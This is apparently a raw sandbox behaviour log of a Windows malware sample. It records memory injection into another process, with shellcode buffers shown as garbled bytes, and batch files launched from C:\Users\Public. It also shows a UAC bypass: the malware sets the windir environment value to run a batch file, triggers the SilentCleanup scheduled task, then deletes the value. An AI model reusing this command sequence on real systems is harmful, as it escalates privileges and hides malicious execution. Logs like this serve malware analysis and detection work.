protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: ˜Õ?w"suEsu
base_address: 0x001a0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x001b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: U‹ìƒÄìVW‹E‹ð}쥥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^‹å]‹ÀU‹ìƒÄàSVW‹ù‰Uü‹Ø‹u3À‰EøhÄI–hØI–èEÿÿPèGÿÿ‰EèhèI–hØI–è-ÿÿPè/ÿÿ‰EähøI–hØI–èÿÿPèÿÿ‰Eàƒþu‰}ðë‹Î‹×‹ÃèGüÿÿ‰Eð‹Uü‹Ãè¢ûÿÿ‰EìjjMàºÐH–‹Ãè`üÿÿ‹Ø…ÛtjÿSè¦ÿÿEôPSè„ÿÿ‹Eô‰Eø‹Eø_^[‹å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadU‹ìƒÄìS‰Eü‹Eü‰Eø‹E‹@ü‹€¤‰EôëU‹Eø‹@ƒèÑè‰Eì‹EøƒÀ‰Eð‹UìJ…Òr0B‹Eðf‹öÅðt‹E‹@ô‹]øfáÿ·ÉÁ‹M‹IøƒEðJuыEð‰Eø‹Eø+Eü;Eôr [‹å]Ã
base_address: 0x001b0000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x10590000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: Y$Y
base_address: 0x00270000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00280000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000057c
1 0 0

WriteProcessMemory

buffer: U‹ìƒÄø‹E‹‰Uø‹P‰Uü1ÀPjÿuøÿUüYY]@U‹ìƒÄÔSVW‹ú‹ðEԋô?–è5ÿÿ3ÀUh½H–dÿ0d‰ ÆEÿ‹G<ljEô»Ãj@h0‹Eô‹@PP‹Eô‹@4ÃPèÿÿ‰Eðƒ}ðt0h€j‹EðPèÿÿj@h0‹Eô‹@PP‹Eô‹@4ÃPVèâÿÿ‰Eðƒ}ðuû0v—EÔP‹Ï‹Uð‹Æ蝋EԅÀt7‰Eè‹Uà‰UìUøR‹UØRP‹EðPVèÖÿÿjjM躈G–‹Æè_ýÿÿ…ÀtÆEÿ3ÀZYYd‰hÄH–Eԋô?–èÿÿÃ
base_address: 0x00280000
process_identifier: 2868
process_handle: 0x0000057c
1 1 0

CreateProcessInternalW

thread_identifier: 1888
thread_handle: 0x0000057c
process_identifier: 3052
current_directory: C:\Users\Public\
filepath:
track: 1
command_line: "C:\Users\Public\Trast.bat"
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000058c
1 1 0

CreateProcessInternalW

thread_identifier: 1116
thread_handle: 0x0000057c
process_identifier: 2740
current_directory: C:\Users\Public\
filepath:
track: 1
command_line: "C:\Users\Public\nest.bat"
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000058c
1 1 0

CreateProcessInternalW

thread_identifier: 2276
thread_handle: 0x00000088
process_identifier: 2320
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2320
1 0 0

CreateProcessInternalW

thread_identifier: 1740
thread_handle: 0x00000088
process_identifier: 3056
current_directory: C:\Users\Public
filepath: C:\Windows\System32\reg.exe
track: 1
command_line: reg delete hkcu\Environment /v windir /f
filepath_r: C:\Windows\system32\reg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2708
thread_handle: 0x00000084
process_identifier: 1636
current_directory: C:\Users\Public
filepath: C:\Windows\System32\reg.exe
track: 1
command_line: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
filepath_r: C:\Windows\system32\reg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2872
thread_handle: 0x00000088
process_identifier: 2052
current_directory: C:\Users\Public
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2232
thread_handle: 0x00000088
process_identifier: 2216
current_directory:
filepath: C:\Windows\System32\reg.exe
track: 1
command_line: reg delete hkcu\Environment /v windir /f
filepath_r: C:\Windows\system32\reg.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2216
1 0 0